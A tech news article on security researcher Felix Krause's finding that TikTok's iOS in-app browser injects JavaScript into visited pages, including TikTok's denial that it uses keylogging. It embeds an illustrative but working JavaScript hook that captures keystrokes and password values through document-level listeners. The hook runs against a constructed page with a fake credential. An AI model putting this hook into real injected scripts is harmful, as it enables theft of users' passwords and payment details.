TikTok injects code into in-app browser, ‘does not use alleged keylogger’
TikTok injects code into third-party web pages when a user opens a link in the app's in-app browser. Among other things, that code could function as a keylogger. According to the platform, the code in question is used only for development purposes.
The controversial code. Image via Felix Krause
Developer and security researcher Felix Krause found that when a user opens a link in the iOS version of TikTok, it opens in an in-app browser into which the app can inject JavaScript. A script injected this way runs with the same access to the page as the page's own code, so it can capture everything entered via the keyboard, including passwords, payment details and other data. He did not investigate whether the Android version of the app behaves the same way.
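To make concrete what "inject JavaScript into the in-app browser" means for a visited page, the following is an added example, not code from TikTok, from the third-party SDK or from Krause's write-up. It shows a script that, once injected into a page, registers document-level listeners and so sees every keystroke, field value and tap on that page. A real app would hand the captured events to native code (in a WKWebView via a message handler reached through window.webkit.messageHandlers, which is assumed here and not shown); an in-memory array stands in for that channel. The small DOM stand-in, the form and the credential typed into it are constructed so the file runs under Node without a browser.

```javascript
// Added example, not TikTok's or Felix Krause's code: what a script injected
// into an in-app browser can collect from a third-party page. The DOM pieces
// below are a constructed stand-in so this runs under Node; the hook itself
// uses only standard DOM calls (addEventListener on the document, event.target).

// Constructed stand-in for the DOM: nodes whose events bubble to the parent.
class FakeNode {
  constructor(parent, props) {
    this.parent = parent || null;
    this.listeners = {};
    this.value = "";
    Object.assign(this, props || {});
  }
  addEventListener(type, fn) {
    if (!this.listeners[type]) this.listeners[type] = [];
    this.listeners[type].push(fn);
  }
  dispatchEvent(ev) {
    if (!ev.target) ev.target = this;              // originating element, as in the DOM
    for (const fn of this.listeners[ev.type] || []) fn(ev);
    if (this.parent) this.parent.dispatchEvent(ev); // bubble up to the document
  }
}

// The injected part. Listeners on the document see every keystroke, input
// change and tap on the page, regardless of what the page's own code does.
// `sink` stands in for the native message handler an app would post to.
function installInputHook(doc, sink) {
  const field = (el) => ({ tag: el.tagName, type: el.type, name: el.name });
  doc.addEventListener("keydown", (ev) => {
    sink.push({ kind: "key", key: ev.key, field: field(ev.target) });
  });
  doc.addEventListener("input", (ev) => {
    // type="password" only masks the screen; the DOM value is readable as-is.
    sink.push({ kind: "value", value: ev.target.value, field: field(ev.target) });
  });
  doc.addEventListener("click", (ev) => {
    sink.push({ kind: "tap", field: field(ev.target) });
  });
}

// Simulate a user typing into a field, firing the events a browser would.
function typeInto(el, text) {
  for (const ch of text) {
    el.dispatchEvent({ type: "keydown", key: ch });
    el.value += ch;
    el.dispatchEvent({ type: "input" });
  }
}

// What the app side could reconstruct for one named field: the typed
// characters from the key events, and the final value from the input events.
function capturedForField(sink, name) {
  const keys = sink
    .filter((e) => e.kind === "key" && e.field.name === name)
    .map((e) => e.key)
    .join("");
  const values = sink.filter((e) => e.kind === "value" && e.field.name === name);
  const last = values.length ? values[values.length - 1].value : "";
  return { fromKeys: keys, fromValue: last };
}

// Constructed login form and credential; nothing here is real data.
function demo() {
  const document = new FakeNode(null, { tagName: "#document" });
  const form = new FakeNode(document, { tagName: "FORM" });
  const user = new FakeNode(form, { tagName: "INPUT", type: "text", name: "user" });
  const pass = new FakeNode(form, { tagName: "INPUT", type: "password", name: "pass" });
  const submit = new FakeNode(form, { tagName: "BUTTON", type: "submit", name: "go" });

  const sink = [];
  installInputHook(document, sink); // the one line the app controls
  typeInto(user, "alice");
  typeInto(pass, "hunter2");
  submit.dispatchEvent({ type: "click" });
  return {
    sink,
    user: capturedForField(sink, "user"),
    pass: capturedForField(sink, "pass"),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = demo();
  console.log(JSON.stringify(r.pass)); // {"fromKeys":"hunter2","fromValue":"hunter2"}
  console.log(r.sink.length, "events captured");
}
```

The point of the example is that the page has no say in this: the hook is registered on the document before the page's own scripts run, and the masking of a password field is purely visual, so a single listener recovers the credential both from the individual key events and from the field's value. Whether any such data is then sent anywhere is decided entirely by the app's native side, which is exactly the part a website or its user cannot inspect.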
TikTok confirmed to Forbes that the JavaScript code is indeed present, but says the reports of an alleged keylogger are misleading. The controversial piece of code is said to be an unused part of a third-party SDK. "Like other platforms, we also use an in-app browser to provide an optimal user experience. The relevant JavaScript code is used for debugging, troubleshooting and monitoring the performance of the application, for example to check the loading speed of a page and whether the page crashes."
According to TikTok, then, the keylogging part of the third-party SDK's code is not used. It is not clear who this third party is, or why a keylogger would be needed for development purposes. TikTok further states that certain captured data is processed only locally on the device and is not forwarded to its servers.
The researcher himself, whose findings are in line with the earlier discovery of tracking in the Instagram and Facebook in-app browsers, says in his write-up that TikTok's statement may well be correct. "Just because an app injects JavaScript into external websites does not necessarily mean that the app is doing something malicious. There is no way to know exactly what data an in-app browser collects and whether this data is being forwarded or used."
It is therefore not established that TikTok actually records users' keyboard input, let alone sends it to its own servers or stores it. That it would be technically possible, however, is beyond serious doubt: from outside, a user or website cannot distinguish a performance-monitoring script from one that forwards what was typed. For that reason, Krause advises copying links opened from TikTok, and likewise from Facebook and Instagram, and pasting them into a trusted standalone browser. The apps then have no in-app browser into which to inject code, and cannot capture sensitive input in this way.